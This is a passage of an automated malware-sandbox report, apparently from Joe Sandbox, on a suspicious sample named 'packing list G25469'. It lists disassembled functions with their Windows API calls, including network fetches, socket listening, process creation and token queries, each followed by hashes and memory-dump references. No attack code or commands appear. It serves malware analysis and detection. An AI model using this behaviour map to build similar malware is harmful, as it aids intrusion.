                                                  • Opcode Fuzzy Hash: dc221ff7dca4c64bba268ebc43daefde7eaf11880e5d58c3a4cfceb4960ae49f
                                                  • Instruction Fuzzy Hash: 62218039500018EFCF298F99C858EFA7BF9EF09720F0445B9F9058B2A2D7349991DB50
                                                  APIs
                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B84358
                                                    • Part of subcall function 00B843E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B84401
                                                    • Part of subcall function 00B843E2: InternetCloseHandle.WININET(00000000), ref: 00B8449E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Internet$CloseConnectHandleOpen
                                                  • String ID:
                                                  • API String ID: 1463438336-0
                                                  • Opcode ID: 985316352fb17b9c24f86a686aa445505f59d3cc647b8fc8a99c872436149190
                                                  • Instruction ID: 0200ef128b0fbe2e78c7803fc6883fd2d2b3b502ae51558a22585ef0eaf77fe7
                                                  • Opcode Fuzzy Hash: 985316352fb17b9c24f86a686aa445505f59d3cc647b8fc8a99c872436149190
                                                  • Instruction Fuzzy Hash: CA21A135200606BBEB16AF619C40FBBB7E9FF44710F10416ABA1597660DBB1D821D794
                                                  APIs
                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00B98AA6
                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B98AC0
                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B98ACE
                                                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00B98ADC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Window$Long$AttributesLayered
                                                  • String ID:
                                                  • API String ID: 2169480361-0
                                                  • Opcode ID: 8f77c55c98ae5418d9cbfda9d1dfd9e0ab3b1dee726fc7867c6d2552bc6f5339
                                                  • Instruction ID: 2dcb289034388106719220d890ff1f6259abcf6401981222f42ae110a492ff5e
                                                  • Opcode Fuzzy Hash: 8f77c55c98ae5418d9cbfda9d1dfd9e0ab3b1dee726fc7867c6d2552bc6f5339
                                                  • Instruction Fuzzy Hash: 78119031305515AFDB04AB18DC45FBA77D9EF86320F2442A9F91AC72E2DFB4AD008B94
                                                  APIs
                                                  • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00B88AE0
                                                  • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00B88AF2
                                                  • accept.WSOCK32(00000000,00000000,00000000), ref: 00B88AFF
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00B88B16
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastacceptselect
                                                  • String ID:
                                                  • API String ID: 385091864-0
                                                  • Opcode ID: 06e28cd26dde3a3ceee291185d37e1e54a68a247be6c2dfaea5b30cfcaa9586a
                                                  • Instruction ID: 9fca3ab9097f00dc5ee2f99432bf0e52512224f37ad623dc011fa73764fd2143
                                                  • Opcode Fuzzy Hash: 06e28cd26dde3a3ceee291185d37e1e54a68a247be6c2dfaea5b30cfcaa9586a
                                                  • Instruction Fuzzy Hash: 6D215172A001249FC7119F69D885ADEBBECEF49350F1081AAF849D7291DF749E41CBA0
                                                  APIs
                                                    • Part of subcall function 00B71E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00B70ABB,?,?,?,00B7187A,00000000,000000EF,00000119,?,?), ref: 00B71E77
                                                    • Part of subcall function 00B71E68: lstrcpyW.KERNEL32(00000000,?,?,00B70ABB,?,?,?,00B7187A,00000000,000000EF,00000119,?,?,00000000), ref: 00B71E9D
                                                    • Part of subcall function 00B71E68: lstrcmpiW.KERNEL32(00000000,?,00B70ABB,?,?,?,00B7187A,00000000,000000EF,00000119,?,?), ref: 00B71ECE
                                                  • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00B7187A,00000000,000000EF,00000119,?,?,00000000), ref: 00B70AD4
                                                  • lstrcpyW.KERNEL32(00000000,?,?,00B7187A,00000000,000000EF,00000119,?,?,00000000), ref: 00B70AFA
                                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,00B7187A,00000000,000000EF,00000119,?,?,00000000), ref: 00B70B2E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: lstrcmpilstrcpylstrlen
                                                  • String ID: cdecl
                                                  • API String ID: 4031866154-3896280584
                                                  • Opcode ID: 74cb7c0d4d780a069675f54058a331c596c990b5c011b577759626e1670da3e3
                                                  • Instruction ID: 45732d4b7bacdc983b681eae9a95e3207ce6eeec3eed1b0d7b7b49502443aa65
                                                  • Opcode Fuzzy Hash: 74cb7c0d4d780a069675f54058a331c596c990b5c011b577759626e1670da3e3
                                                  • Instruction Fuzzy Hash: 2611D636110305EFDB25AF38DC45D7A77E8FF45314B8081AAE91ACB250EB719A40C7A0
                                                  APIs
                                                  • _free.LIBCMT ref: 00B62FB5
                                                    • Part of subcall function 00B5395C: __FF_MSGBANNER.LIBCMT ref: 00B53973
                                                    • Part of subcall function 00B5395C: __NMSG_WRITE.LIBCMT ref: 00B5397A
                                                    • Part of subcall function 00B5395C: RtlAllocateHeap.NTDLL(010D0000,00000000,00000001,00000001,00000000,?,?,00B4F507,?,0000000E), ref: 00B5399F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap_free
                                                  • String ID:
                                                  • API String ID: 614378929-0
                                                  • Opcode ID: b864490f7298cd6372b5c701a458772d471dff1ab1729f20c79aba13debdcd49
                                                  • Instruction ID: dcd5fb9ea1bc44161e6d1f6af50705ff7bfc8be618e426e79e4e70c7124a783e
                                                  • Opcode Fuzzy Hash: b864490f7298cd6372b5c701a458772d471dff1ab1729f20c79aba13debdcd49
                                                  • Instruction Fuzzy Hash: C3110A31549612ABDB323F74AC4576E3BD8EF00761F2049E5FC499B152DF78C9448A90
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00B705AC
                                                  • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00B705C7
                                                  • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00B705DD
                                                  • FreeLibrary.KERNEL32(?), ref: 00B70632
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                  • String ID:
                                                  • API String ID: 3137044355-0
                                                  • Opcode ID: 7191a56e2207ed055f8d14a1d76d3f3caa1af7882862e4474f6b20d724569f8e
                                                  • Instruction ID: 1f48fe3adc0fecc36c4dd7fa23e32390dd2b57b00d2a6eee7500efbf09c391c9
                                                  • Opcode Fuzzy Hash: 7191a56e2207ed055f8d14a1d76d3f3caa1af7882862e4474f6b20d724569f8e
                                                  • Instruction Fuzzy Hash: A0218471910209EFDB20AF95DC98ADABBF8EF40700F00C5AAE52A93150DBB4EA55DF50
                                                  APIs
                                                  • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00B76733
                                                  • _memset.LIBCMT ref: 00B76754
                                                  • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00B767A6
                                                  • CloseHandle.KERNEL32(00000000), ref: 00B767AF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: CloseControlCreateDeviceFileHandle_memset
                                                  • String ID:
                                                  • API String ID: 1157408455-0
                                                  • Opcode ID: 0396adc0817e8369ba975426fc7f1301df21b91c21010bd5b8299b5fdfe6707c
                                                  • Instruction ID: d87518675fa5a94f19418289580da95dfc334aad971e374401a884e0ccb6f5cd
                                                  • Opcode Fuzzy Hash: 0396adc0817e8369ba975426fc7f1301df21b91c21010bd5b8299b5fdfe6707c
                                                  • Instruction Fuzzy Hash: 9011CA759012287AE72057A5AC4DFABBBBCEF44764F1042DAF918E71D0D6744E808B64
                                                  APIs
                                                    • Part of subcall function 00B6AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B6AA79
                                                    • Part of subcall function 00B6AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B6AA83
                                                    • Part of subcall function 00B6AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B6AA92
                                                    • Part of subcall function 00B6AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B6AA99
                                                    • Part of subcall function 00B6AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B6AAAF
                                                  • GetLengthSid.ADVAPI32(?,00000000,00B6ADE4,?,?), ref: 00B6B21B
                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00B6B227
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00B6B22E
                                                  • CopySid.ADVAPI32(?,00000000,?), ref: 00B6B247
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                  • String ID:
                                                  • API String ID: 4217664535-0
                                                  • Opcode ID: 86e782a93a5d60c566829f5d5c6f7f052426916780365c3e7a666743ef400758
                                                  • Instruction ID: 06fc40aa1bc5f43f9db3dd8225835ea5b35fc4fa1fc480ae23a4e742054e71f4
                                                  • Opcode Fuzzy Hash: 86e782a93a5d60c566829f5d5c6f7f052426916780365c3e7a666743ef400758
                                                  • Instruction Fuzzy Hash: 0D118272A00205AFDB149F98DCA5EAEBBF9FF85304B1480ADE542E7210D7799E84CB10
                                                  APIs
                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00B6B498
                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B6B4AA
                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B6B4C0
                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B6B4DB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 5abed5cfaa5f9fa9dee5ba0436cd946fb70aa62c6ca4f95d576870efa8e7ead9
                                                  • Instruction ID: 5a19d9079c837e9de0af13cef05455f7d5177464cb5a073707fc2f1c99609d45
                                                  • Opcode Fuzzy Hash: 5abed5cfaa5f9fa9dee5ba0436cd946fb70aa62c6ca4f95d576870efa8e7ead9
                                                  • Instruction Fuzzy Hash: 6511487A900218FFDB11DFA8C881E9DBBB8FF08700F204091EA04B7294DB71AE51DB94
                                                  APIs
                                                    • Part of subcall function 00B4B34E: GetWindowLongW.USER32(?,000000EB), ref: 00B4B35F
                                                  • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00B4B5A5
                                                  • GetClientRect.USER32(?,?), ref: 00BAE69A
                                                  • GetCursorPos.USER32(?), ref: 00BAE6A4
                                                  • ScreenToClient.USER32(?,?), ref: 00BAE6AF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Client$CursorLongProcRectScreenWindow
                                                  • String ID:
                                                  • API String ID: 4127811313-0
                                                  • Opcode ID: 59a8bc6f0429522e4d46f9385585d407beda2c8fed0935f6c904119c8074caf9
                                                  • Instruction ID: 70e40379ebdaf29b92b84ec9cb00045c80f1e805227616e156a8719dd9324813
                                                  • Opcode Fuzzy Hash: 59a8bc6f0429522e4d46f9385585d407beda2c8fed0935f6c904119c8074caf9
                                                  • Instruction Fuzzy Hash: 1E110A3150002ABBCB10EF58DD85DAEB7F9EB19304F100995EA12E7140D774EA95DBA5
                                                  APIs
                                                  • GetCurrentThreadId.KERNEL32 ref: 00B77352
                                                  • MessageBoxW.USER32(?,?,?,?), ref: 00B77385
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00B7739B
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00B773A2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                  • String ID:
                                                  • API String ID: 2880819207-0
                                                  • Opcode ID: 3390155d6e168bce3ed095c3e6b90e6e65f4f77be595f0a3cf566cb4f9a3b6c0
                                                  • Instruction ID: 5a8db4bc2157e897486c9f0a0e6f7e63a18eef3b5e2cecce85dde76645c8b924
                                                  • Opcode Fuzzy Hash: 3390155d6e168bce3ed095c3e6b90e6e65f4f77be595f0a3cf566cb4f9a3b6c0
                                                  • Instruction Fuzzy Hash: 761108B2A04204AFC7019B6CDC05AAE7BEDDB45310F044395F935E3261EEB08D0187A4
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B4D1BA
                                                  • GetStockObject.GDI32(00000011), ref: 00B4D1CE
                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00B4D1D8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: CreateMessageObjectSendStockWindow
                                                  • String ID:
                                                  • API String ID: 3970641297-0
                                                  • Opcode ID: de68bf87e13494ba62b80e69c004e2d1a1165f715a393d5d1cdb6ca0b03b5c6d
                                                  • Instruction ID: ef0556693495955b879c1626ea9dc4f3068cfdea20f72d9a500e3acd04a55e03
                                                  • Opcode Fuzzy Hash: de68bf87e13494ba62b80e69c004e2d1a1165f715a393d5d1cdb6ca0b03b5c6d
                                                  • Instruction Fuzzy Hash: B211C072501509BFEF024F94DC50EEABBA9FF08364F040256FE1562050DB75DE60EBA0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                  • String ID:
                                                  • API String ID: 3016257755-0
                                                  • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                  • Instruction ID: 029ae74d47f9515995c33dbf6ec5152932e4e1aa6d7ab92905216236e0e4f6b7
                                                  • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                  • Instruction Fuzzy Hash: 3B014B3200054ABBCF2A5E84DC558EE3FA2FB18350F588495FA1859135D33BCAB1EB81
                                                  APIs
                                                    • Part of subcall function 00B57A0D: __getptd_noexit.LIBCMT ref: 00B57A0E
                                                  • __lock.LIBCMT ref: 00B5748F
                                                  • InterlockedDecrement.KERNEL32(?), ref: 00B574AC
                                                  • _free.LIBCMT ref: 00B574BF
                                                  • InterlockedIncrement.KERNEL32(010E1ED0), ref: 00B574D7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                  • String ID:
                                                  • API String ID: 2704283638-0
                                                  • Opcode ID: f52f982a583f5cfb35e3ac647ae867dbbfd49998f9851c96b9ff5c5f19f292b2
                                                  • Instruction ID: 2dde2dd4a0d3da9000a52e07ea5e44105e77677921ad80f4c1bb0d6734f1cd9f
                                                  • Opcode Fuzzy Hash: f52f982a583f5cfb35e3ac647ae867dbbfd49998f9851c96b9ff5c5f19f292b2
                                                  • Instruction Fuzzy Hash: 06010032A896619BD722AF25B88971DBBE0FF04722F1540C5FC1467390CF246908CFC6
                                                  APIs
                                                  • __lock.LIBCMT ref: 00B57AD8
                                                    • Part of subcall function 00B57CF4: __mtinitlocknum.LIBCMT ref: 00B57D06
                                                    • Part of subcall function 00B57CF4: EnterCriticalSection.KERNEL32(00000000,?,00B57ADD,0000000D), ref: 00B57D1F
                                                  • InterlockedIncrement.KERNEL32(?), ref: 00B57AE5
                                                  • __lock.LIBCMT ref: 00B57AF9
                                                  • ___addlocaleref.LIBCMT ref: 00B57B17
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                  • String ID:
                                                  • API String ID: 1687444384-0
                                                  • Opcode ID: 12da3cb4af9f7481c8ce9d7ebbe3f5cbcfd9f413327703ecb9217c222e5f1ae7
                                                  • Instruction ID: 8f13aa57f506c7556113fa4e279790fcd03c9e89c3cd0483a3231ad132731134
                                                  • Opcode Fuzzy Hash: 12da3cb4af9f7481c8ce9d7ebbe3f5cbcfd9f413327703ecb9217c222e5f1ae7
                                                  • Instruction Fuzzy Hash: 65016D72544B40DFD721DF75D94674AB7F0EF50322F2089CEA89A972A0CFB0A648CB41
                                                  APIs
                                                  • _memset.LIBCMT ref: 00B9E33D
                                                  • _memset.LIBCMT ref: 00B9E34C
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00BF3D00,00BF3D44), ref: 00B9E37B
                                                  • CloseHandle.KERNEL32 ref: 00B9E38D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: _memset$CloseCreateHandleProcess
                                                  • String ID:
                                                  • API String ID: 3277943733-0
                                                  • Opcode ID: 0a23f37a676b2343b922c384cb7062c16d6300382ea0c197760d08dd9fd841cb
